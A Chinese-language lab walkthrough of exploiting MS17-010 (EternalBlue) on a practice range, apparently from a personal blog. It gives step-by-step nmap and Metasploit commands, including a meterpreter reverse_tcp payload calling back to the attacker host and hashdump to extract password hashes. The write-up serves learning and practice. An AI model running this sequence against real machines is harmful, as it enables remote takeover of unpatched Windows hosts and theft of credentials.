MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。 函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用。srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大小错误,而导致缓冲区溢出。
这里我用的是安界网的靶场
kali192.168.0.3Windows7192.168.0.2打开nmap对目标机进行扫描
nmap -sV -Pn 192.168.0.2目标机开放了135、139、445等端口,系统为win7 然后我们打开msf
msfconsole打开 metasploite 命令行客户端,使用search命令查找ms17-010漏洞的相关模块
search ms17-010由于这是靶场所以我们直接利用
use exploit/windows/smb/ms17_010_eternalblue查看配置信息,并设置标记为yes的属性
show options设置攻击目标机的IP地址
set RHOSTS 192.168.0.2之后,选择载荷payload,也就是shellcode,此处我们选择回连至控制端shell的payload
set payload windows/x64/meterpreter/reverse_tcp同样,载荷也需要进行配置,show options查看配置信息 配置中缺少本地主机 LHOST,设置一下
set LHOST 192.168.0.3完成配置后,运行exploit或者run,开始执行漏洞利用模块
run成功获取来自目标主机的Session会话
我们已经成功的获取Session会话了,本次我们继续介绍meterpreter后渗透模块的其他功能 运行sysinfo查看目标机器相关信息
sysinfo执行help命令可以帮助我们了解meterpreter有哪些功能
help接下来,我们获取目标机hash值 执行hashdump
hashdump又是朴素而又充实的一天!